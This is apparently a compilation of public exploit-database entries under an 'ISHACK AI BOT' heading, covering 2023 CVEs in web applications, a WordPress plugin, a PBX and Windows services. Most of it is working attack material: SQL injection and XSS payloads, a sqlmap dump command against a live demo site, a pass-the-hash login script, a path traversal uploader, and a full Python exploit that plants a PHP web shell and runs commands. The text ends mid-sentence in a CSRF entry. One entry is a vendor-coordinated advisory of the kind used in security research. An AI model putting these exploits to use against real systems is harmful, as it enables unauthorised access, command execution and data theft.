ISHACK AI BOT

# Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI) # Date of found: 18/05/2023 # Exploit Author: VIVEK CHOUDHARY @sudovivek # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html # CVE: CVE-2023-33584 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584 Vulnerability Description - Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. Steps to Reproduce - The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0: 1. Launch the Enrollment System Project V1.0 application. 2. Open the login page by accessing the URL: http://localhost/enrollment/login.php. 3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}. 4. Click the login button to execute the SQL Injection payload. As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.

# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-06-03 # Exploit Author: tmrswrr # Vendor Homepage: https://barebonescms.com/ # Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip # Version: v2.0.2 # Tested : https://demo.barebonescms.com/ --- Description --- 1) Login admin panel and go to new story : https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540 2) Click edit button and write your payload in the title field: Payload: "><script>alert(1)</script> 3) After save change and will you see alert button POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1 Host: demo.barebonescms.com Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 237 Origin: https://demo.barebonescms.com Dnt: 1 Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE) # Date: 05/31/2023 # Exploit Author: Mateus Machado Tesser # Vendor Homepage: https://advancedfilemanager.com/ # Version: File Manager Advanced Shortcode 2.3.2 # Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15 # CVE: CVE-2023-2068 import requests import json import pprint import sys import re PROCESS = "\033[1;34;40m[*]\033[0m" SUCCESS = "\033[1;32;40m[+]\033[0m" FAIL = "\033[1;31;40m[-]\033[0m" try: COMMAND = sys.argv[2] IP = sys.argv[1] if len(COMMAND) > 1: pass if IP: pass else: print(f'Use: {sys.argv[0]} IP COMMAND') except: pass url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel print(f"{PROCESS} Searching fmakey") try: r = requests.get(url) raw_fmakey = r.text fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1] if len(fmakey) == 0: print(f"{FAIL} Cannot found fmakey!") except: print(f"{FAIL} Cannot found fmakey!") print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!') url = "http://"+IP+"/wp-admin/admin-ajax.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"} data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n" data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n" r = requests.post(url, headers=headers, data=data) print(f"{PROCESS} Sending AJAX request to: {url}") if 'errUploadMime' in r.text: print(f'{FAIL} Exploit failed!') sys.exit() elif r.headers['Content-Type'].startswith("text/html"): print(f'{FAIL} Exploit failed! Try to change _fmakey') sys.exit(0) else: print(f'{SUCCESS} Exploit executed with success!') exploited = json.loads(r.text) url = "" print(f'{PROCESS} Getting URL with webshell') for i in exploited["added"]: url = i['url'] print(f"{PROCESS} Executing '{COMMAND}'") r = requests.get(url+'?cmd='+COMMAND) print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible Affected Versions: 7.3.0.10 and earlier versions Fixed Versions: - Vulnerability Type: Broken Authentication Security Risk: low Vendor URL: https://www.starface.de Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004 Advisory Status: published CVE: CVE-2023-33243 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243 Introduction ============ "When functionality and comfort come together, the result is a state-of-the-art experience that we've dubbed 'comfortphoning'. It's a secure, scalable digital communication solution that meets every need and wish. STARFACE is easy to integrate into existing IT systems and flexibly grows with your requirements." (from the vendor's homepage) More Details ============ The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from the vendor's homepage [1]. The included files can be further examined by either extracting the contents or running the image in a virtual machine. The web interface of the PBX uses the JavaScript file at the following path to submit the login form: ------------------------------------------------------------------------ js/prettifier.js ------------------------------------------------------------------------ The following two lines of the JavaScript file "prettifier.js" add the two parameters "secret" and "ack" to the form before being submitted: ------------------------------------------------------------------------ $form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk)); $form(document.forms[0]).add('ack', defaultVals.k); ------------------------------------------------------------------------ The JavaScript object "defaultVals" is included in the web application's source text. While the value of "defaultVals.k" was found to be the static hash of the PBX version, the value of "defaultVals.bk" contains a nonce only valid for the currently used session. Therefore, the form parameter "ack" is always the same value. For the form value "secret" the function "createHash()" is called with different arguments. The value of "defaultVals.isAd" is set to "false" when login via Active Directory is disabled. The parameters "liv" and "lpv" contain the username and password entered into the form respectively. ------------------------------------------------------------------------ const createHash = function (isAD, user, pass, nonces) { if (isAD) { return forAD.encode(user + nonces + pass); } return user + ':' + forSF(user + nonces + forSF(pass)); }; ------------------------------------------------------------------------ The expression right after the second return statement is the implementation used when Active Directory login is disabled which is the default setting. The return value is composed of the username separated via a colon from a value built using the "forSF()" function. The "forSF()" function was found to calculate the SHA512 hash value. When considering the arguments passed to the function, the hash is calculated as follows: ------------------------------------------------------------------------ SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password)) ------------------------------------------------------------------------ As can be seen, instead of the cleartext password the SHA512 hash of the password is used in the calculation. In conclusion, for the form value "secret" the following value is transmitted: ------------------------------------------------------------------------ username + ":" + SHA512( username + defaultVals.k + defaultVals.bk + SHA512(password) ) ------------------------------------------------------------------------ If the SHA512 hash of a user's password is known, it can be directly used in the calculation of the "secret" during the login process. Knowledge of the cleartext password is not required. This finding was also verified by analysing the decompiled Java code of the server component. It was also found that the authentication process of the REST API is vulnerable in a very similar manner. Proof of Concept ================ The following Python script can be used to perform a login by specifying a target URL, a username and the associated password hash: ------------------------------------------------------------------------ #!/usr/bin/env python3 import click import hashlib import re import requests import typing def get_values_from_session(url, session) -> typing.Tuple[str, str]: k, bk = "", "" response_content = session.get(f"{url}/jsp/index.jsp").text k_result = re.search("\sk : '([^']+)'", response_content) bk_result = re.search("\sbk : '([^']+)'", response_content) if k_result != None: k = k_result.group(1) if bk_result != None: bk = bk_result.group(1) return k, bk def web_login(url, login, pwhash, session) -> bool: version, nonce = get_values_from_session(url, session) if version == "" or nonce == "": print("Web Login failed: Nonce and version hash can not be retrieved.") return value = login + version + nonce + pwhash secret = hashlib.sha512(value.encode("utf-8")).hexdigest() data = { "forward": "", "autologin": "false", "secret": f"{login}:{secret}", "ack": version, } login_request = session.post( f"{url}/login", data=data, allow_redirects=False, headers={"Referer": f"{url}/jsp/index.jsp"}, ) response_headers = login_request.headers if "Set-Cookie" in response_headers: session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0] print(f"Session ID: {session_id}") return True else: print("Invalid login data") return False def get_nonce_from_api(url, session) -> str: response_content = session.get(f"{url}/rest/login").json() return response_content["nonce"] if "nonce" in response_content else "" def rest_login(url, login, pwhash, session): nonce = get_nonce_from_api(url, session) if nonce == "": print("REST Login failed: Nonce can not be retrieved.") return value = login + nonce + pwhash secret = hashlib.sha512(value.encode("utf-8")).hexdigest() data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"} login_request = session.post( f"{url}/rest/login", json=data, headers={"Content-Type": "application/json", "X-Version": "2"}, ) response_data = login_request.json() token = response_data["token"] if "token" in response_data else "none" print(f"REST API Token: {token}") @click.command() @click.option('--url', help='Target System URL', required=True) @click.option('--login', help='Login ID', required=True) @click.option('--pwhash', help='Password Hash', required=True) def login(url, login, pwhash): session = requests.session() stripped_url = url.rstrip("/") result = web_login(stripped_url, login, pwhash, session) if result: rest_login(stripped_url, login, pwhash, session) if __name__ == "__main__": login() ------------------------------------------------------------------------ For example, the SHA512 hash of the password "starface" can be calculated as follows: ------------------------------------------------------------------------ $ echo -n "starface" | sha512sum a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec - ------------------------------------------------------------------------ The Python script can be run as follows to perform a login as the user "0001" with the aforementioned hash: ------------------------------------------------------------------------ $ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash 'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec' Session ID: 2CF09656E274F000FFAD023AF37629CE REST API Token: 51eef8f8vp3d3u81k0imjbuuu7 ------------------------------------------------------------------------ When the password hash is valid for the specified user of the targeted instance a session ID as well as a REST API token is returned. Afterwards, these values can be used to interact with the web application and the REST API. Workaround ========== None Fix === On 4 May 2023, version 8.0.0.11 was released. In this version the vulnerability was addressed with a temporary solution, such that the password hashes are encrypted before they are saved in the database. This approach prevents attackers from exploiting this vulnerability in scenarios where they have only acquired pure database access. However, attackers with system level access can bypass this temporary measure as they can extract the encryption key and decrypt the hashes in the database. A solution that fixes this vulnerability entirely is still in progress. Security Risk ============= The web interface and REST API of STARFACE allow to login using the password hash instead of the cleartext password. This can be exploited by attackers who gained access to the application's database where the passwords are also saved as a SHA512 hash of the cleartext passwords. While the precondition for this attack could be the full compromise of the STARFACE PBX, another attack scenario could be that attackers acquire access to backups of the database stored on another system. Furthermore, the login via password hash allows attackers for permanent unauthorised access to the web interface even if system access was obtained only temporarily. Due to the prerequisites of obtaining access to password hashes, the vulnerability poses a low risk only. Timeline ======== 2022-12-06 Vulnerability identified 2022-12-13 Customer approved disclosure to vendor 2023-01-11 Vendor notified 2023-05-04 Vendor released new version 8.0.0.11 2023-05-19 CVE ID requested 2023-05-20 CVE ID assigned 2023-06-01 Advisory released References ========== [0] https://starface.com/en/products/comfortphoning/ [1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694 RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

# Title: MotoCMS Version 3.4.3 - SQL Injection # Author: tmrswrr # Date: 01/06/2023 # Vendor: https://www.motocms.com # Link: https://www.motocms.com/website-templates/demo/189526.html # Vulnerable Version(s): MotoCMS 3.4.3 ## Description MotoCMS Version 3.4.3 SQL Injection via the keyword parameter. ## Steps to Reproduce 1) By visiting the url: https://template189526.motopreview.com/store/category/search/?keyword=1 2) Run sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch and this command sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump ### Parameter & Payloads ### Parameter: keyword (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE

# Exploit Title: Macro Expert 4.9 - Unquoted Service Path # Date: 04/06/2023 # Exploit Author: Murat DEMIRCI # Vendor Homepage: http://www.macro-expert.com/ # Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe # Version: 4.9 # Tested on: Windows 10 # Proof of Concept : C:\Users\Murat>sc qc "Macro Expert" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Macro Expert TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Macro Expert DEPENDENCIES : SERVICE_START_NAME : LocalSystem # If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts.

# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/ # Date: 2023-04-24 # Exploit Author: LEE SE HYOUNG (hackintoanetwork) # Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/ # Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip # Category: Web Application # Version: 1.6.7 # Tested on: Debian / WordPress 6.1.1 # CVE : CVE-2023-30868 # Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve # 1. Technical Description: The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed. # 2. Proof of Concept (PoC): WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS) In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7. 1. CMS Tree Page View Plugin <= 1.6.6 a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E. b. your payload will be executed.

[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts. 2. CMS Tree Page View Plugin <= 1.6.7 a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22. b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows). 
[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.

# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path # Date: 2023-31-05 # Exploit Author: Jeffrey Bencteux # Vendor Homepage: https://binisoft.org/ # Software Link: https://binisoft.org/wfc # Version: 4.1.0.0 # Tested on: Microsoft Windows 11 Pro # Vulnerability Type: Unquoted Service Path PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" USB Flash Drives Control usbcs C:\Program Files\USB Flash Drives Control\usbcs.exe Auto PS C:\> sc.exe qc usbcs [SC] QueryServiceConfig SUCCESS SERVICE_NAME: usbcs TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\USB Flash Drives Control\usbcs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : USB Flash Drives Control DEPENDENCIES : SERVICE_START_NAME : LocalSystem PS C:\> systeminfo OS Name: Microsoft Windows 11 Pro OS Version: 10.0.22621 N/A Build 22621 OS Manufacturer: Microsoft Corporation -- Jeffrey BENCTEUX

# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal # Date: 08-Jun-2023 # Exploit Author: Galoget Latorre (@galoget) # CVE: CVE-2023-34096 (Galoget Latorre) # Vendor Homepage: https://thruk.org/ # Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip # Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096 # CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html # GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h # Affected Versions: <= 3.06 # Language: Python 3.x # Tested on: # - Ubuntu 22.04.5 LTS 64-bit # - Debian GNU/Linux 10 (buster) 64-bit # - Kali GNU/Linux 2023.1 64-bit # - CentOS GNU/Linux 8.5.2111 64-bit #!/usr/bin/python3 # -*- coding:utf-8 -*- import sys import warnings import requests from bs4 import BeautifulSoup from termcolor import cprint # Usage: python3 exploit.py <target.site> # Example: python3 exploit.py http://127.0.0.1/thruk/ # Disable warnings warnings.filterwarnings('ignore') # Set headers headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" } def banner(): """ Function to print the banner """ banner_text = """ __ __ __ __ __ __ __ __ __ __ / \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__ \\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__) Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06 Exploit & CVE Author: Galoget Latorre (@galoget) LinkedIn: https://www.linkedin.com/in/galoget """ print(banner_text) def usage_instructions(): """ Function that validates the number of arguments. The application MUST have 2 arguments: - [0]: Name of the script - [1]: Target URL (Thruk Base URL) """ if len(sys.argv) != 2: print("Usage: python3 exploit.py <target.site>") print("Example: python3 exploit.py http://127.0.0.1/thruk/") sys.exit(0) def check_vulnerability(thruk_version): """ Function to check if the recovered version is vulnerable to CVE-2023-34096. Prints additional information about the vulnerability. """ try: if float(thruk_version[1:5]) <= 3.06: if float(thruk_version[4:].replace("-", ".")) < 6.2: cprint("[+] ", "green", attrs=['bold'], end = "") print("This version of Thruk is ", end = "") cprint("VULNERABLE ", "red", attrs=['bold'], end = "") print("to CVE-2023-34096!") print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html") print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h") print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096") print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096") print(" | Thruk Changelog: https://www.thruk.org/changelog.html") print(" | Fixed version: 3.06-2+") print("") return True else: cprint("[-] ", "red", attrs=['bold'], end = "") print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.") return False except: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error parsing Thruk's version.\n") return False def get_thruk_version(): """ Function to get Thruk's version via web scraping. It also verifies the title of the website to check if the target is a Thruk instance. """ response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10) html_soup = BeautifulSoup(response.text, "html.parser") if "<title>Thruk Monitoring Webinterface</title>" not in response.text: cprint("[-] ", "red", attrs=['bold'], end = "") print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.") sys.exit(-1) else: # Extract version anchor tag version_link = html_soup.find_all("a", {"class": "link text-sm"}) if len(version_link) == 1 and version_link[0].has_attr('href'): thruk_version = version_link[0].text.strip() cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Detected Thruk Version (Public Banner): {thruk_version}\n") return thruk_version else: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error retrieving Thruk's version.") sys.exit(-1) def get_error_info(): """ Function to cause an error in the target Thruk instance and collect additional information via web scraping. """ # URL that will cause an error error_url = target + "//cgi-bin/login.cgi" # Retrieve Any initial Cookies error_response = requests.get(error_url, headers=headers, allow_redirects=False, verify=False, timeout=10) cprint("[*] ", "blue", attrs=['bold'], end = "") print("Trying to retrieve additional information...\n") try: # Search for the error tag html_soup = BeautifulSoup(error_response.text, "html.parser") error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text if len(error_report) > 0: # Print Error Info error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")] cprint("[+] ", "green", attrs=['bold'], end = "") print("Recovered Information: \n") parsed_error_report = error_report.split("\n") for error_line in parsed_error_report: print(f" {error_line}") except: cprint("[-] ", "red", attrs=['bold'], end = "") print("No additional information available.\n") def get_thruk_session_auto_login(): """ Function to login into the Thruk instance and retrieve a valid session. It will use default Thruk's credentials available here: - https://www.thruk.org/documentation/install.html Change credentials if required. """ # Default Credentials - Change if required username = "thrukadmin" # CHANGE ME password = "thrukadmin" # CHANGE ME params = {"login": username, "password": password} cprint("[*] ", "blue", attrs=['bold'], end = "") print(f"Trying to autenticate with provided credentials: {username}/{password}\n") # Define Login URL login_url = "cgi-bin/login.cgi" session = requests.Session() # Retrieve Any initial Cookies session.get(target, headers=headers, allow_redirects=True, verify=False) # Login and get thruk_auth Cookie session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False) # Get Cookies as dictionary cookies = session.cookies.get_dict() # Successful Login if cookies.get('thruk_auth') is not None: cprint("[+] ", "green", attrs=['bold'], end = "") print("Successful Authentication!\n") cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n") return session # Failed Login else: if cookies.get('thruk_message') == "fail_message~~login%20failed": cprint("[-] ", "red", attrs=['bold'], end = "") print("Login Failed, check your credentials.") sys.exit(401) def cve_2023_34096_exploit_path_traversal(logged_session): """ Function that attempts to exploit the Path Traversal Vulnerability. The exploit will try to upload a PoC file to multiple common folders. This to prevent permissions errors to cause false negatives. """ cprint("[*] ", "blue", attrs=['bold'], end = "") print("Trying to exploit: ", end = "") cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold']) # Define Upload URL upload_url = "cgi-bin/panorama.cgi" # Absolute paths common_folders = ["/tmp/", "/etc/thruk/plugins/plugins-enabled/", "/etc/thruk/panorama/", "/etc/thruk/bp/", "/etc/thruk/thruk_local.d/", "/var/www/", "/var/www/html/", "/etc/", ] # Upload PoC file to each folder for target_folder in common_folders: # PoC file extension is jpg due to regex validations of Thruk. # Nevertheless this issue can still cause damage in different ways to the affected instance. files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")} data = {"task": "upload", "type": "image", "location": f"backgrounds/../../../..{target_folder}" } upload_response = logged_session.post(target + upload_url, data=data, files=files, headers=headers, allow_redirects=False, verify=False) try: upload_response = upload_response.json() if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True: cprint("[+] ", "green", attrs=['bold'], end = "") print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n") elif upload_response.get("msg") == "Fileupload must use existing and writable folder.": cprint("[-] ", "red", attrs=['bold'], end = "") print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n") else: cprint("[-] ", "red", attrs=['bold'], end = "") print("File upload failed.\n") except: cprint("[-] ", "red", attrs=['bold'], end = "") print("File upload failed.\n") if __name__ == "__main__": banner() usage_instructions() # Change this with the domain or IP address to attack if sys.argv[1] and sys.argv[1].startswith("http"): target = sys.argv[1] else: target = "http://127.0.0.1/thruk/" # Prepare Base Target URL if not target.endswith('/'): target += "/" cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Target URL: {target}\n") # Get Thruk version via web scraping scraped_thruk_version = get_thruk_version() # Send a request that will generate an error and collect extra info get_error_info() # Check if the instance is vulnerable to CVE-2023-34096 vulnerable_status = check_vulnerability(scraped_thruk_version) if vulnerable_status: cprint("[+] ", "green", attrs=['bold'], end = "") print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?") # Confirm exploitation option = input("\nChoice (Y/N): ").lower() print("") if option == "y": cprint("[*] ", "blue", attrs=['bold'], end = "") print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n") # Login into Thruk instance valid_session = get_thruk_session_auto_login() # Exploit Path Traversal Vulnerability cve_2023_34096_exploit_path_traversal(valid_session) elif option == "n": cprint("[*] ", "blue", attrs=['bold'], end = "") print("No exploitation attempts were performed, Goodbye!\n") sys.exit(0) else: cprint("[-] ", "red", attrs=['bold'], end = "") print("Unknown option entered.") sys.exit(1) else: cprint("[-] ", "red", attrs=['bold'], end = "") print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.") sys.exit(2)

# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF) # Google Dork: n/a # Date: 09/06/2023 # Exploit Author: Ramil Mustafayev (kryptohaker) # Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php # Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28 # CVE : n/a Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data. To exploit this vulnerability, an attacker needs to do the following: 1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/ 2. Identify the email address of 